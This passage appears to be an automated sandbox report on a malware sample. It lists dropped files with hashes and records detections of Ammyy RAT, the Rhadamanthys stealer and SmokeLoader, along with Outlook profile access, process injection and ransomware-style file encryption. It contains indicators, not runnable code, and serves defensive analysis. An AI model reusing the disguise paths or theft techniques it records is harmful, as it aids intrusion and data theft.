SHA256 3b2cc8ba128b5fa362ffb2c91170f06693aa0ecd0aa75712e17edf19a8092966
SHA512 32cab7f3852343a4c8111125b667c91ec6365b59f969c5ec97d7cbbe6fd511cb4ce86b6b00d396499412fd7d8ada4c6019e9d744b18b70676028a52a4d4d7ea0

memory/4796-54-0x00000000004B0000-0x000000000055C000-memory.dmp

memory/3916-57-0x0000000000280000-0x0000000000328000-memory.dmp

memory/4796-58-0x0000000004D20000-0x0000000004D66000-memory.dmp

memory/4796-56-0x0000000074B10000-0x00000000752C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

MD5 422418e5fa8fb0f192159bccd8ce327b
SHA1 197daad5b4cf36d20e8f8d63bdaf0ea433f84cc0
SHA256 3b2cc8ba128b5fa362ffb2c91170f06693aa0ecd0aa75712e17edf19a8092966
SHA512 32cab7f3852343a4c8111125b667c91ec6365b59f969c5ec97d7cbbe6fd511cb4ce86b6b00d396499412fd7d8ada4c6019e9d744b18b70676028a52a4d4d7ea0

memory/4796-60-0x0000000004DF0000-0x0000000004E36000-memory.dmp

memory/3916-59-0x0000000004AF0000-0x0000000004B32000-memory.dmp

memory/3916-64-0x0000000004B30000-0x0000000004B74000-memory.dmp

memory/4796-63-0x0000000004E50000-0x0000000004E84000-memory.dmp

memory/3896-65-0x00007FF876AB0000-0x00007FF876CA5000-memory.dmp

memory/4796-67-0x0000000004D70000-0x0000000004D80000-memory.dmp

memory/3916-66-0x0000000004C20000-0x0000000004C52000-memory.dmp

memory/3916-62-0x0000000004B80000-0x0000000004B90000-memory.dmp

memory/3916-61-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/2772-68-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\2L_3@-Np_.exe

MD5 422418e5fa8fb0f192159bccd8ce327b
SHA1 197daad5b4cf36d20e8f8d63bdaf0ea433f84cc0
SHA256 3b2cc8ba128b5fa362ffb2c91170f06693aa0ecd0aa75712e17edf19a8092966
SHA512 32cab7f3852343a4c8111125b667c91ec6365b59f969c5ec97d7cbbe6fd511cb4ce86b6b00d396499412fd7d8ada4c6019e9d744b18b70676028a52a4d4d7ea0

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

memory/3916-76-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/2036-72-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2772-71-0x0000000000400000-0x000000000040B000-memory.dmp

memory/4796-77-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/2036-78-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-79-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\X2MpkYv.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/4184-82-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/4184-83-0x00000000053B0000-0x00000000053C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\X2MpkYv.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

memory/4184-88-0x0000000074BB0000-0x0000000075360000-memory.dmp

memory/428-89-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3164-90-0x0000000002CD0000-0x0000000002CE6000-memory.dmp

memory/2772-92-0x0000000000400000-0x000000000040B000-memory.dmp

memory/2036-104-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-105-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-108-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-106-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-111-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-126-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-124-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-211-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-113-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[8BE9EB4B-3483].[[email protected]].8base

MD5 60816178dbfc4894a2238a14f4e99355
SHA1 2570b72f2c4f1afb1f6fb49e73e44d6fca41326c
SHA256 77aea9fe2cf39187cfa101d08488ea84ec621532b3edefacf4a7ce5d04722552
SHA512 1f3960fb7d14c4a835b57d537844f8053340ec4d4c38a9e1ab2e5cc50e08e21897b3fe7ed60e499c6ae20329361dc67f0fd1cb8a3d0d0b70a40cd64216f7b20e

memory/2036-236-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-252-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2036-442-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3896-510-0x000001BE53590000-0x000001BE53595000-memory.dmp

memory/3896-511-0x00007FF876AB0000-0x00007FF876CA5000-memory.dmp

memory/428-822-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B188.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Temp\B188.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

C:\Users\Admin\AppData\Local\Temp\B188.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

memory/3880-2279-0x00000000749F0000-0x00000000751A0000-memory.dmp

memory/3880-2289-0x0000000004D60000-0x0000000004D70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

memory/1228-2336-0x0000000000200000-0x000000000027C000-memory.dmp

memory/1228-2335-0x00000000749F0000-0x00000000751A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B188.exe

MD5 b540d836ffd19faa25af885e6d305da5
SHA1 67e7a1b17251b2a0bf03715c31d620825cb90cfc
SHA256 20e4f468905a59feb933d8b83ffbca0a4b90471512be00a096c37f56153b1590
SHA512 e34c0e1fc3eaba2ea7b2cb59525adaa4fcfc7b090886e8229a6ca6f30b0666375fd5c04749d35572e7bd686ce2a24c891c665b1146d4ffb0f3e65a6d66f20bb5

memory/1228-2357-0x00000000057D0000-0x0000000005862000-memory.dmp

memory/3880-2369-0x00000000749F0000-0x00000000751A0000-memory.dmp

memory/1900-2372-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1228-2368-0x0000000005870000-0x000000000590C000-memory.dmp

memory/1228-2528-0x0000000006720000-0x0000000006730000-memory.dmp

memory/1228-2549-0x0000000006660000-0x00000000066A2000-memory.dmp

memory/1228-2666-0x0000000006A20000-0x0000000006A2A000-memory.dmp

memory/1228-3716-0x00000000749F0000-0x00000000751A0000-memory.dmp

memory/1228-3726-0x0000000006720000-0x0000000006730000-memory.dmp

memory/1900-3781-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1228-3965-0x0000000007B10000-0x0000000007B2A000-memory.dmp

memory/1228-3994-0x0000000007B70000-0x0000000007B76000-memory.dmp

memory/1228-4051-0x0000000006720000-0x0000000006730000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

memory/1980-4262-0x00000000749F0000-0x00000000751A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EE27.exe

MD5 31277de974d31978d4013701dee62a4b
SHA1 1e82d394f4c3709215d31fa87172f31d02a198eb
SHA256 eb2a6bff370821d00b58842c80ba0564d699a9d7b82f5af391c5870d239ce671
SHA512 c152c8cb9a4eef5d86dbb85b529eb3bbffa32a0da7912daaffd78cf1c2ca0b95cbc1a7b063df759ebce959e53211a34bcda1ba143c5e30956e3e0db6717c3b29

C:\Users\Admin\AppData\Local\Temp\EE27.exe

MD5 31277de974d31978d4013701dee62a4b
SHA1 1e82d394f4c3709215d31fa87172f31d02a198eb
SHA256 eb2a6bff370821d00b58842c80ba0564d699a9d7b82f5af391c5870d239ce671
SHA512 c152c8cb9a4eef5d86dbb85b529eb3bbffa32a0da7912daaffd78cf1c2ca0b95cbc1a7b063df759ebce959e53211a34bcda1ba143c5e30956e3e0db6717c3b29

memory/1980-4271-0x0000000000B00000-0x00000000013B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x00o19f5.default-release\cookies.sqlite.id[8BE9EB4B-3483].[[email protected]].8base

MD5 95d9b8ddc443e1da83f0ad1fff011b24
SHA1 65cb18d480949ac0f0f0fd32ef3c6dda518a1ee0
SHA256 69a98eb0a6a55a6c25064e42c5ff217f51accecabf04ad5493922ecb5abddfd2
SHA512 2a54f05f53f890178c642f76ad8ab04e650fd3aaa85c79bc4d0da35f868d8f11dc18988d1a48f97cf89c0419398cc3b4d1f1206e0a2047f6d7b8becd63659338

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ECAF.exe.log

MD5 f7047b64aa01f9d80c7a5e177ce2485c
SHA1 bab6005f4a30f12ee36b9abf6bfdfaa5411bbff8
SHA256 807356d2424d2d04f51ebd56f926d4d5a8318bc947c76569a3b5ca2c2f279915
SHA512 a9af5ace72eb66a6156a5d8764031cdc46feefffabb6898651f91a5af7f3bcef645e63e8d01ed35f1105e824d6830f6fa97e70adda2d5b148ffaff5f54ca248f

C:\Users\Admin\AppData\Local\Temp\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\Update.bat

MD5 73a4d310cdd90000b9cc71223411c40f
SHA1 b068ef9b457bab0ff610047b8f277213c3f26c5b
SHA256 1cc2e10d240a44dca38dd1be915311886213e37e4c1b3006090ed7d33b0b53ff
SHA512 1adea98392da014b1a97259612f647e807cb7f0189bbe6a6689d5d1e83899943ad8647564f71ed870e4671a3cbe98614653170e26b56cce71bb820836bb796e1

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\svchost.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

C:\Users\Admin\AppData\Local\Temp\2CE2.tmp\aa_nts.msg

MD5 3f05819f995b4dafa1b5d55ce8d1f411
SHA1 404449b79a16bfc4f64f2fd55cd73d5d27a85d71
SHA256 7e0bf0cbd06a087500a9c3b50254df3a8a2c2980921ab6a62ab1121941c80fc0
SHA512 34abb7df8b3a68e1649ff0d2762576a4d4e65da548e74b1aa65c2b82c1b89f90d053ecddac67c614ca6084dc5b2cb552949250fb70f49b536f1bcb0057717026

C:\Users\Admin\AppData\Local\Temp\Update.bat

MD5 73a4d310cdd90000b9cc71223411c40f
SHA1 b068ef9b457bab0ff610047b8f277213c3f26c5b
SHA256 1cc2e10d240a44dca38dd1be915311886213e37e4c1b3006090ed7d33b0b53ff
SHA512 1adea98392da014b1a97259612f647e807cb7f0189bbe6a6689d5d1e83899943ad8647564f71ed870e4671a3cbe98614653170e26b56cce71bb820836bb796e1

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\Update.bat

MD5 73a4d310cdd90000b9cc71223411c40f
SHA1 b068ef9b457bab0ff610047b8f277213c3f26c5b
SHA256 1cc2e10d240a44dca38dd1be915311886213e37e4c1b3006090ed7d33b0b53ff
SHA512 1adea98392da014b1a97259612f647e807cb7f0189bbe6a6689d5d1e83899943ad8647564f71ed870e4671a3cbe98614653170e26b56cce71bb820836bb796e1

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\Temp\B496.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Local\WindowsSecurity\ECAF.exe

MD5 86e4447c89dad11996270b6c538f2805
SHA1 a91abbd12885320ca177b5a00792156a30e72a37
SHA256 31a736e30a56614796a42b127e62900f40ca06b877941a1ad240e082b1b96aa9
SHA512 d7426ebabe1ac0d56262fef456ecdca3f991ffc72aaff9fa081bf75e614779cb71669f046b04285d2107ce0ad5ef66ed4312301ce38caa24ecd7cbf7a014609d

C:\Users\Admin\AppData\Local\Temp\Update.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-01 17:38

Reported

2023-10-01 17:41

Platform

win7-20230831-en

Max time kernel

87s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2556 created 1264 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\certreq.exe N/A

Accesses Microsoft Outlook profiles

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\certreq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\certreq.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
